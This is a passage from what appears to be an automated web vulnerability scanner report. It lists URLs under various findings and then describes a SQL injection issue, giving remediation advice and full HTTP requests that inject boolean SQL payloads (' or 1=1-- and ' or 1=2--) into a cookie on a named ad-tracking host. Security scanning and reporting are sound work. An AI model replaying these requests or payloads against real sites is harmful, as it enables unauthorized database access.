22.118. http://research.microsoft.com/en-us/people/aratan/default.aspx

22.119. http://research.microsoft.com/en-us/people/asellen/

22.120. http://research.microsoft.com/en-us/people/asellen/default.aspx

22.121. http://research.microsoft.com/en-us/people/bainguo/default.aspx

22.122. http://research.microsoft.com/en-us/people/bibuxton/default.aspx

22.123. http://research.microsoft.com/en-us/people/birrell/default.aspx

22.124. http://research.microsoft.com/en-us/people/blinn/default.aspx

22.125. http://research.microsoft.com/en-us/people/bycook/default.aspx

22.126. http://research.microsoft.com/en-us/people/cthacker/default.aspx

22.127. http://research.microsoft.com/en-us/people/dburger/

22.128. http://research.microsoft.com/en-us/people/dburger/default.aspx

22.129. http://research.microsoft.com/en-us/people/deng/default.aspx

22.130. http://research.microsoft.com/en-us/people/dmb/

22.131. http://research.microsoft.com/en-us/people/dmb/default.aspx

22.132. http://research.microsoft.com/en-us/people/dwork/

22.133. http://research.microsoft.com/en-us/people/gbell/default.aspx

22.134. http://research.microsoft.com/en-us/people/ggr/default.aspx

22.135. http://research.microsoft.com/en-us/people/goldberg/default.aspx

22.136. http://research.microsoft.com/en-us/people/grama/default.aspx

22.137. http://research.microsoft.com/en-us/people/gray/

22.138. http://research.microsoft.com/en-us/people/gray/default.aspx

22.139. http://research.microsoft.com/en-us/people/hon/default.aspx

22.140. http://research.microsoft.com/en-us/people/horvitz/default.aspx

22.141. http://research.microsoft.com/en-us/people/hsalama/default.aspx

22.142. http://research.microsoft.com/en-us/people/hshum/default.aspx

22.143. http://research.microsoft.com/en-us/people/indranim/

22.144. http://research.microsoft.com/en-us/people/jamiesho/

22.145. http://research.microsoft.com/en-us/people/jbishop/default.aspx

22.146. http://research.microsoft.com/en-us/people/jiansun/default.aspx

22.147. http://research.microsoft.com/en-us/people/johndo/default.aspx

22.148. http://research.microsoft.com/en-us/people/jplatt/default.aspx

22.149. http://research.microsoft.com/en-us/people/jtw/default.aspx

22.150. http://research.microsoft.com/en-us/people/krw/default.aspx

22.151. http://research.microsoft.com/en-us/people/kstrauss/

22.152. http://research.microsoft.com/en-us/people/larus/default.aspx

22.153. http://research.microsoft.com/en-us/people/lilich/

22.154. http://research.microsoft.com/en-us/people/lilich/default.aspx

22.155. http://research.microsoft.com/en-us/people/lintaoz/default.aspx

22.156. http://research.microsoft.com/en-us/people/liuj/default.aspx

22.157. http://research.microsoft.com/en-us/people/lomet/default.aspx

22.158. http://research.microsoft.com/en-us/people/luca/default.aspx

22.159. http://research.microsoft.com/en-us/people/malvar/

22.160. http://research.microsoft.com/en-us/people/malvar/default.aspx

22.161. http://research.microsoft.com/en-us/people/manuelc/default.aspx

22.162. http://research.microsoft.com/en-us/people/marycz/default.aspx

22.163. http://research.microsoft.com/en-us/people/mds/

22.164. http://research.microsoft.com/en-us/people/mds/default.aspx

22.165. http://research.microsoft.com/en-us/people/milanv/

22.166. http://research.microsoft.com/en-us/people/milanv/default.aspx

22.167. http://research.microsoft.com/en-us/people/mzh/

22.168. http://research.microsoft.com/en-us/people/najork/default.aspx

22.169. http://research.microsoft.com/en-us/people/pachou/default.aspx

22.170. http://research.microsoft.com/en-us/people/padmanab/default.aspx

22.171. http://research.microsoft.com/en-us/people/palarson/default.aspx

22.172. http://research.microsoft.com/en-us/people/parno/

22.173. http://research.microsoft.com/en-us/people/philbe/

22.174. http://research.microsoft.com/en-us/people/philbe/default.aspx

22.175. http://research.microsoft.com/en-us/people/ramjee/

22.176. http://research.microsoft.com/en-us/people/ranveer/default.aspx

22.177. http://research.microsoft.com/en-us/people/rashid/default.aspx

22.178. http://research.microsoft.com/en-us/people/richdr/default.aspx

22.179. http://research.microsoft.com/en-us/people/robertson/default.aspx

22.180. http://research.microsoft.com/en-us/people/roylevin/

22.181. http://research.microsoft.com/en-us/people/sdumais/default.aspx

22.182. http://research.microsoft.com/en-us/people/shuvendu/default.aspx

22.183. http://research.microsoft.com/en-us/people/simonpj/

22.184. http://research.microsoft.com/en-us/people/simonpj/default.aspx

22.185. http://research.microsoft.com/en-us/people/spli/

22.186. http://research.microsoft.com/en-us/people/surajitc/

22.187. http://research.microsoft.com/en-us/people/surajitc/default.aspx

22.188. http://research.microsoft.com/en-us/people/terry/default.aspx

22.189. http://research.microsoft.com/en-us/people/thekkath/default.aspx

22.190. http://research.microsoft.com/en-us/people/thoare/

22.191. http://research.microsoft.com/en-us/people/thoare/default.aspx

22.192. http://research.microsoft.com/en-us/people/tonyhey/default.aspx

22.193. http://research.microsoft.com/en-us/people/tsharp/

22.194. http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx

22.195. http://research.microsoft.com/en-us/people/wobber/default.aspx

22.196. http://research.microsoft.com/en-us/people/wong/default.aspx

22.197. http://research.microsoft.com/en-us/people/wyma/

22.198. http://research.microsoft.com/en-us/people/zhao/default.aspx

22.199. http://research.microsoft.com/en-us/press/ablake.aspx

22.200. http://research.microsoft.com/en-us/press/anandan.aspx

22.201. http://research.microsoft.com/en-us/press/bainguo.aspx

22.202. http://research.microsoft.com/en-us/press/borgs.aspx

22.203. http://research.microsoft.com/en-us/press/cmbishop.aspx

22.204. http://research.microsoft.com/en-us/press/default.aspx

22.205. http://research.microsoft.com/en-us/press/fastfacts.aspx

22.206. http://research.microsoft.com/en-us/press/hon.aspx

22.207. http://research.microsoft.com/en-us/press/jchayes.aspx

22.208. http://research.microsoft.com/en-us/press/kevinsch.aspx

22.209. http://research.microsoft.com/en-us/press/kwood.aspx

22.210. http://research.microsoft.com/en-us/press/malvar.aspx

22.211. http://research.microsoft.com/en-us/press/mds.aspx

22.212. http://research.microsoft.com/en-us/press/overview.aspx

22.213. http://research.microsoft.com/en-us/press/rajamani.aspx

22.214. http://research.microsoft.com/en-us/press/roylevin.aspx

22.215. http://research.microsoft.com/en-us/press/telabbady.aspx

22.216. http://research.microsoft.com/en-us/projects/chem4word/default.aspx

22.217. http://research.microsoft.com/en-us/projects/creativecommons/default.aspx

22.218. http://research.microsoft.com/en-us/projects/csec/

22.219. http://research.microsoft.com/en-us/projects/nodexl/

22.220. http://research.microsoft.com/en-us/projects/researchgames/

22.221. http://research.microsoft.com/en-us/projects/serviceos/

22.222. http://research.microsoft.com/en-us/projects/wwt/contest.aspx

22.223. http://research.microsoft.com/en-us/projects/wwt/default.aspx

22.224. http://research.microsoft.com/en-us/research/default.aspx

22.225. http://research.microsoft.com/en-us/um/people/awf/

22.226. http://research.microsoft.com/en-us/um/people/bahl/

22.227. http://research.microsoft.com/en-us/um/people/borgs/

22.228. http://research.microsoft.com/en-us/um/people/jchayes/

22.229. http://research.microsoft.com/en-us/um/people/szeliski/

22.230. http://research.microsoft.com/en-us/um/redmond/about/timeline/

22.231. http://research.microsoft.com/feedGen/

22.232. http://research.microsoft.com/nothing.html

22.233. http://static.ak.facebook.com/connect/canvas_proxy.php

22.234. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/FGFbc80dUKj.png

22.235. http://www.facebook.com/connect/uiserver.php

22.236. http://www.facebook.com/extern/login_status.php

22.237. http://www.facebook.com/extern/login_status.php

22.238. http://www.facebook.com/extern/login_status.php

22.239. http://www.facebook.com/extern/login_status.php

22.240. http://www.facebook.com/extern/login_status.php

22.241. http://www.facebook.com/extern/login_status.php

22.242. http://www.facebook.com/plugins/like.php

22.243. http://www.facebook.com/plugins/like.php

22.244. http://www.facebook.com/plugins/like.php

22.245. http://www.facebook.com/plugins/like.php

22.246. http://www.facebook.com/plugins/like.php

22.247. http://www.facebook.com/plugins/like.php

22.248. http://www.facebook.com/plugins/like.php

22.249. http://www.facebook.com/plugins/like.php

22.250. http://www.facebook.com/plugins/like.php

22.251. http://www.facebook.com/plugins/like.php

22.252. http://www.facebook.com/plugins/like.php

22.253. http://www.facebook.com/plugins/like.php

22.254. http://www.facebook.com/plugins/like.php

22.255. http://www.facebook.com/plugins/like.php

22.256. http://www.register.com/

22.257. http://www.register.com/domain/searchresults.rcmx

22.258. http://www.register.com/unauthenticated_session_expired.rcmx

22.259. http://www.register.com/unauthenticated_session_expired.rcmx

23. Credit card numbers disclosed

23.1. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/bek_tr.pdf

23.2. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/dagstuhl-summary-09141.pdf

23.3. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/hotsec06.pdf

23.4. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/pepm08.pdf

23.5. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/transducers_tr.pdf

23.6. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/usenixsec11a.pdf

23.7. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp07.pdf

23.8. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp10.pdf

23.9. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pdf

23.10. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/usenixtech08.pdf

23.11. http://research.microsoft.com/en-us/um/people/livshits/papers/tr/scriptgard_tr.pdf

23.12. http://research.microsoft.com/en-us/um/people/nswamy/papers/beep-www07.pdf

23.13. http://research.microsoft.com/en-us/um/people/nswamy/papers/rs.pdf

23.14. http://research.microsoft.com/en-us/um/people/shuochen/papers/ScriptAccenting.pdf

23.15. http://research.microsoft.com/en-us/um/people/xiaohe/publication/IEEE_MMSP06_p226.pdf

23.16. http://research.microsoft.com/en-us/um/people/zhang/

23.17. http://research.microsoft.com/en-us/um/redmond/events/aplwaca2010/s0pknu7ytck3k3lq9nas/p45-krithinakis.pdf

23.18. http://www.meetup.com/Boston-BizSpark-Meetup/

24. Robots.txt file

24.1. http://825-wpk-761.mktoresp.com/webevents/visitWebPage

24.2. http://ads.bluelithium.com/pixel

24.3. http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js

24.4. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

24.5. http://c.mouseflow.com/a.gif

24.6. http://c7.zedo.com/img/bh.gif

24.7. https://cart.godaddy.com/basket.aspx

24.8. http://cspix.media6degrees.com/orbserv/hbpix

24.9. http://d3.zedo.com/jsc/d3/bh.html

24.10. http://d7.zedo.com/img/bh.gif

24.11. http://dclk-match.dotomi.com/

24.12. http://fonts.googleapis.com/css

24.13. https://idp.godaddy.com/login.aspx

24.14. http://imagesak.securepaynet.net/assets/godaddy.ico

24.15. http://img.godaddy.com/image.aspx

24.16. http://img1.wsimg.com/assets/godaddy.ico

24.17. http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js

24.18. http://login.dotomi.com/ucm/UCMController

24.19. https://mya.godaddy.com/products/accountlist.aspx

24.20. http://pagead2.googlesyndication.com/pagead/imgad

24.21. http://pixel.adblade.com/imps.php

24.22. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard

24.23. http://rss2search.com/delivery/ti.php

24.24. http://s.gravatar.com/js/gprofiles.js

24.25. http://segment-pixel.invitemedia.com/set_partner_uid

24.26. http://themes.googleusercontent.com/static/fonts/droidsans/v1/EFpQQyG9GqCrobXxL-KRMQFhaRv2pGgT5Kf0An0s4MM.woff

24.27. http://value.register.com/b/ss/registerwww-production/1/H.20.3/s74702994271647

24.28. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html

24.29. https://www.cheapssls.com/index.php

24.30. http://www.digicert.com/

24.31. http://www.godaddy.com/SSL

24.32. https://www.godaddy.com/gdshop/xt_orderform_addmany.asp

24.33. http://www.googleadservices.com/pagead/conversion/1051291126/

24.34. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/

24.35. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

24.36. https://www.microcad.ca/checkout/address

24.37. http://www.shrinktheweb.com/scripts/pagepix.js

24.38. https://www.sslmatrix.com/ssl-promotion-code

24.39. http://www.wunderground.com/dotset.php

24.40. http://www.youtube-nocookie.com/gen_204

25. Cacheable HTTPS response

25.1. https://careers.microsoft.com/Resumes.aspx

25.2. https://idp.godaddy.com/login.aspx

25.3. https://idp.godaddy.com/retrieveaccount.aspx

25.4. https://onlineaanvraag.diginotar.nl/Digiforms/FormDesigner.aspx

25.5. https://support.microsoft.com/contactus/emailcontact.aspx

25.6. https://www.diginotar.com/Branchsolutions/tabid/857/Default.aspx

25.7. https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx

25.8. https://www.microsoft-careers.com/

25.9. https://www.microsoft-careers.com/content/corporate-research/

25.10. https://www.microsoft-careers.com/find.job

25.11. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/

25.12. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

25.13. https://www.sslmatrix.com/Order/quickorder

25.14. https://www.sslmatrix.com/ssl-promotion-code

25.15. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

26. HTML does not specify charset

26.1. http://d3.zedo.com/jsc/d3/bh.html

26.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

26.3. http://mediacdn.disqus.com/1314991730/build/system/def.html

26.4. http://mediacdn.disqus.com/1314991730/build/system/reply.html

26.5. http://mediacdn.disqus.com/1314991730/build/system/upload.html

26.6. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.7. https://onlineaanvraag.diginotar.nl/

26.8. http://research.microsoft.com/apps/dp/h.htm

26.9. http://research.microsoft.com/en-us/um/people/chengh/measure.html

26.10. http://research.microsoft.com/en-us/um/people/chengh/measurev2.html

26.11. http://research.microsoft.com/en-us/um/people/darkok/

26.12. http://research.microsoft.com/en-us/um/people/dbwilson/

26.13. http://research.microsoft.com/en-us/um/people/horvitz/

26.14. http://research.microsoft.com/en-us/um/people/lamport/

26.15. http://research.microsoft.com/en-us/um/people/livshits/papers/abstracts/usenixsec11b.abstract.html

26.16. http://research.microsoft.com/en-us/um/people/ratul/

26.17. http://research.microsoft.com/en-us/um/people/schramm/memorial/

26.18. http://research.microsoft.com/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/list.html

26.19. http://research.microsoft.com/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/standard-prelude.html

26.20. http://research.microsoft.com/en-us/um/people/ssaponas/

26.21. http://research.microsoft.com/en-us/um/people/yongrui/

26.22. http://research.microsoft.com/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/VMNetsrv.msi.htm

26.23. http://research.microsoft.com/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/obsolete/VMNetSrv.msi.htm

26.24. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

26.25. http://www.godaddy.com/sso/keepalive.aspx

26.26. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php

26.27. https://www.sslmatrix.com/favicon.ico

27. Content type incorrectly stated

27.1. http://api.twitter.com/1/urls/resolve.json

27.2. http://api.twitter.com/1/users/search.json

27.3. http://api.twitter.com/i/search/image_facets.json

27.4. http://api.twitter.com/i/search/video_facets.json

27.5. http://diginotar.nl/Default.aspx

27.6. http://farm6.static.flickr.com/clientaccesspolicy.xml

27.7. http://farm6.static.flickr.com/crossdomain.xml

27.8. http://farm7.static.flickr.com/clientaccesspolicy.xml

27.9. http://feeds.feedburner.com/~s/meetup

27.10. http://img1.meetupstatic.com/39194172310009655/img/noPhoto_50.gif

27.11. http://img1.meetupstatic.com/photos/event/2/c/b/b/highres_36191451.jpeg

27.12. http://img1.meetupstatic.com/photos/event/6/e/b/highres_45241771.jpeg

27.13. http://img1.meetupstatic.com/photos/event/9/9/8/5/highres_32139301.jpeg

27.14. http://img2.meetupstatic.com/photos/event/9/c/2/3/highres_39819971.jpeg

27.15. http://img2.meetupstatic.com/photos/event/a/5/e/7/highres_43722471.jpeg

27.16. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png

27.17. http://microsoftcambridge.com/favicon.ico

27.18. http://microsoftcambridge.com/slideshow/Vertigo.small.xap

27.19. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.20. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

27.21. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Annuleren.png

27.22. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Volgende.png

27.23. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Vorige.png

27.24. http://photos1.meetupstatic.com/photos/event/2/8/a/0/thumb_22990400.jpeg

27.25. http://photos1.meetupstatic.com/photos/event/a/0/9/5/highres_9821109.jpeg

27.26. http://photos1.meetupstatic.com/photos/member/3/2/3/0/thumb_11052848.jpeg

27.27. http://photos2.meetupstatic.com/photos/event/9/1/d/e/thumb_10177342.jpeg

27.28. http://photos2.meetupstatic.com/photos/event/a/1/9/a/highres_9821370.jpeg

27.29. http://photos2.meetupstatic.com/photos/member/7/6/d/8/thumb_1590424.jpeg

27.30. http://photos2.meetupstatic.com/photos/member/a/e/2/9/thumb_9884585.jpeg

27.31. http://photos3.meetupstatic.com/photos/event/a/0/9/4/highres_9821108.jpeg

27.32. http://photos3.meetupstatic.com/photos/member/1/3/0/f/thumb_11344879.jpeg

27.33. http://photos3.meetupstatic.com/photos/member/1/d/6/1/thumb_18127521.jpeg

27.34. http://photos3.meetupstatic.com/photos/member/7/e/a/1/thumb_12752417.jpeg

27.35. http://photos4.meetupstatic.com/photos/event/a/0/9/6/highres_9821110.jpeg

27.36. http://photos4.meetupstatic.com/photos/member/2/7/2/f/thumb_20650031.jpeg

27.37. http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx

27.38. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx

27.39. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx

27.40. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

27.41. http://search.twitter.com/search.json

27.42. http://survey.112.2o7.net/survey/dynamic/suites/276/omniturecom-2011/list.js

27.43. http://twitter.com/account/available_features

27.44. http://vasco.com/app_pages/getDCP.aspx

27.45. http://www.godaddy.com/sso/keepalive.aspx

27.46. http://www.google.com/search

27.47. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php

27.48. http://www.meetup.com/api/

27.49. http://www.microcad.ca/livezilla/images/carrier_logo.gif

27.50. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc

27.51. http://www.microsoft-careers.com/model/remote/remotejobManager.cfc

27.52. http://www.omniture.com/listener.html

27.53. http://www.register.com/font/vag-bold.ttf

27.54. http://www.register.com/font/vag-bold.woff

28. Content type is not specified

28.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

28.2. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard

29. SSL certificate

29.1. https://cart.godaddy.com/

29.2. https://idp.godaddy.com/

29.3. https://mya.godaddy.com/

29.4. https://www.cheapssls.com/

29.5. https://www.godaddy.com/

29.6. https://www.microcad.ca/

29.7. https://www.sslmatrix.com/



1. SQL injection
There are 20 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The acs cookie appears to be vulnerable to SQL injection attacks. The payloads 18652187'%20or%201%3d1--%20 and 18652187'%20or%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt1018652187'%20or%201%3d1--%20; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: clid=2lqyje70117095fjndb6bb2p0000h02q6u2q102q92q; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u30arp9u303td9w00f7u9u307219w00a6p9w000kn9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: rdrlst=41l0sh6lqyjef0000001h6u1h0m79lqyjec0000001z6u1z0xv3lqyjec0000001y6u1y0m7dlqyjee0000001o6u1o16pilqyjea000000286u280x18lqyjee0000001p6u1p18ldlqyjeb000000276u270moulqyjee0000001n6u1n0moqlqyjeb000000226u2218etlqyjea000000286u280dhxlqyjea000000286u2818lqlqyjea000000296u291196lqyjea0000002c6u2c14khlqyjea000000286u2814hnlqyjea000000286u281195lqyjea0000002d6u2d1194lqyje90000002e6u2e00c1lqyjee0000001p6u1p1axvlqyjee0000001l6u1l1193lqyje90000002f6u2f1192lqyje70000002l6u2l10tylqyje90000002g6u2g0cablqyjee0000001p6u1p06pblqyjee0000001p6u1p07sylqyjee0000001p6u1p18w4lqyjef0000001k6u1k10telqyje80000002h6u2h16d5lqyjee0000001p6u1p159elqyjee0000001m6u1m10rdlqyje80000002i6u2i0m3zlqyjec000000206u200miwlqyjec000000216u211ad8lqyje80000002j6u2j18k9lqyjeb000000266u260m0slqyjee0000001q6u1q0m43lqyjed0000001r6u1r0m0olqyjeb000000236u231679lqyjed0000001s6u1s12qnlqyje70000002k6u2k0mjdlqyjeb000000246u240mjhlqyjed0000001t6u1t1671lqyjeb000000256u250lw4lqyjea000000286u280lm1lqyjed0000001u6u1u0rzglqyjef0000001i6u1i18kzlqyjea0000002a6u2a17gxlqyjea000000286u280lm5lqyjed0000001v6u1v0lltlqyjec0000001w6u1w0zpelqyjea000000286u280llxlqyjec0000001x6u1x18knlqyjea0000002b6u2b18hblqyjef0000001j6u1j0afolqyjee0000001p6u1p0kkjlqyjee0000001p6u1p14b
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt1018652187'%20or%201%3d2--%20; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: vstcnt=41bb010r064zbs2150v10023d7x118e10124fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: clid=2lqyje70117095fjndb6bb2p0000i02r6u2r102r92r; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
